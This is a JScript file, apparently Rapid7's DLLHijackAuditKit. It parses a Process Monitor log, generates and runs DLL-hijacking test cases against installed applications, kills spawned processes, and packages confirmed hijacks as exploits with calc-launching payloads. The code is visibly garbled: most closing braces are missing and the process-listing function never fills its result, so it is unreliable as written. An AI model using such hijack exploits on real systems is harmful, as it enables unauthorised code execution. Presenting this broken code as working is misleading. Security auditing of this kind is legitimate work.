
203 lines
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/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var oShl = new ActiveXObject("WScript.Shell");
var oCWD = oShl.CurrentDirectory + "";
function print_status(msg) {
try {
WScript.StdOut.WriteLine("[*] "+ msg);
} catch(e) {}
function process_list() {
var res = new Array();
var wbemFlagReturnImmediately = 0x10;
var wbemFlagForwardOnly = 0x20;
var oWMI = GetObject("winmgmts:\\\\localhost\\root\\CIMV2");
var cPID = oWMI.ExecQuery("SELECT * FROM Win32_Process", "WQL", wbemFlagReturnImmediately | wbemFlagForwardOnly);
var enumItems = new Enumerator(cPID);
for (; !enumItems.atEnd(); enumItems.moveNext()) {
var p = enumItems.item();
if (p.ExecutablePath && p.ExecutablePath.toLowerCase().indexOf("taskmgr") != -1) continue;
return res;
function replace_payloads(dir, src) {
var base = oFso.GetFolder(dir);
var files = new Enumerator(base.files);
for (; !files.atEnd(); files.moveNext()) {
var entry = files.item().Name.toString().toLowerCase();
if ( entry.indexOf("exploit.") == -1) {
if (entry.toString().indexOf(".exe") != -1) {
try { oFso.CopyFile(src + "\\runcalc.exe", dir + "\\" + entry); } catch(e) { }
} else {
try { oFso.CopyFile(src + "\\runcalc.dll", dir + "\\" + entry); } catch(e) { }
var subs = new Enumerator(base.SubFolders);
for (; !subs.atEnd(); subs.moveNext()) {
var entry = (subs.item() + "").toLowerCase();
replace_payloads(entry, src);
/* Process Logfile.CSV
a) Make a list of applications and their associated DLLs
b) Create a test case for each extension and each DLL
c) Run each test case and look for "exploited.txt"
d) Copy confirmed test cases to a new directory
if (! oFso.FileExists("Logfile.CSV")) {
print_status("Please save Logfile.CSV to the current directory first");
var procs = process_list();
print_status("Protecting " + procs.length + " processes");
var apps = new Array();
var fCSV = oFso.OpenTextFile("Logfile.CSV");
var line = fCSV.ReadLine();
var iPath = 4;
var iProc = 1;
var bits = line.split(",");
// Determine which fields are what index
for (var i=0; i < bits.length; i++) {
if (bits[i].toLowerCase().indexOf("process name") != -1) {
iProc = i;
if (bits[i].toLowerCase().indexOf("path") != -1) {
iPath = i;
// Parse the CSV into a map of each application's loads
while( ! fCSV.AtEndOfStream ) {
line = fCSV.ReadLine();
bits = line.replace(/\",/g, "\"||||").replace(/"/g, '').split("||||");
var vApp = bits[iProc].toLowerCase();
var vPath = bits[iPath].toLowerCase();
var vExt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\")[0].toLowerCase();
var vTgt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\");
var vDll = vTgt.join("\\").toLowerCase();
if (! apps[vApp]) apps[vApp] = new Array();
if (! apps[vApp][vExt]) apps[vApp][vExt] = new Array();
apps[vApp][vExt][vDll] = true;
print_status("Generating and validating test cases...");
try { oFso.CreateFolder(oCWD + "\\TestCases"); } catch(e) { }
try { oFso.CreateFolder(oCWD + "\\Exploits"); } catch(e) { }
for (var tApp in apps) {
print_status(" Application: " + tApp);
var aBase = oCWD + "\\TestCases\\" + tApp;
try { oFso.CreateFolder(aBase); } catch(e) { }
for (var tExt in apps[tApp]) {
var eBase = aBase + "\\" + tExt;
var aExploited = new Array();
try { oFso.CreateFolder(eBase); } catch(e) { }
for (var tDll in apps[tApp][tExt]) {
var tBits = tDll.split("\\");
var tName = tBits.pop();
var dBase = eBase + "\\" + tName;
try { oFso.CreateFolder(dBase); } catch(e) { }
if (aExploited[tName]) continue;
// tDll may be a subdirectory + DLL
tPath = dBase;
for (var y = 0; y < tBits.length; y++) {
tPath = tPath + "\\" + tBits[y];
try { oFso.CreateFolder(tPath); } catch(e) { }
tPath = tPath + "\\" + tName;
try {
if (tName.toLowerCase().indexOf(".exe") != -1) {
oFso.CopyFile(oCWD + "\\runtest.exe", tPath);
} else {
oFso.CopyFile(oCWD + "\\runtest.dll", tPath);
} catch(e) { }
// Create the actual test case file
try {
var a = oFso.CreateTextFile(dBase + "\\exploit." + tExt);
} catch(e) { }
try {
// Run the test case
oShl.CurrentDirectory = dBase;
oShl.Run("cmd.exe /c start exploit." + tExt, 0);
} catch(e) { }
var nprocs = process_list();
var cnt = 0;
while(nprocs.length == procs.length && cnt < 2) {
nprocs = process_list();
// If an application spawned, give it three seconds
// This helps with ProcMon memory usage as well
if (nprocs.length > procs.length) {
var killer = "taskkill /F ";
for (var i=0; i < nprocs.length; i++) {
var found = false;
for (var x=0; x < procs.length; x++) {
if (nprocs[i] == procs[x]) {
found = true;
if (found) continue;
killer = killer + "/PID " + nprocs[i] + " ";
oShl.Run(killer, 0, true);
// Check for the file existence
if (oFso.FileExists(dBase + "\\exploited.txt")) {
print_status("Successfully exploited " + tApp + " with ." + tExt + " using " + tName);
aExploited[tName] = true;
var xBase = oCWD + "\\Exploits\\" + tApp + "_" + tExt + "_" + tName;
try { oFso.CreateFolder(xBase); } catch(e) { }
try { oFso.CopyFolder(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
try { oFso.CopyFile(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
try { oFso.DeleteFile(xBase + "\\exploited.txt"); } catch(e) { }
replace_payloads(xBase, oCWD);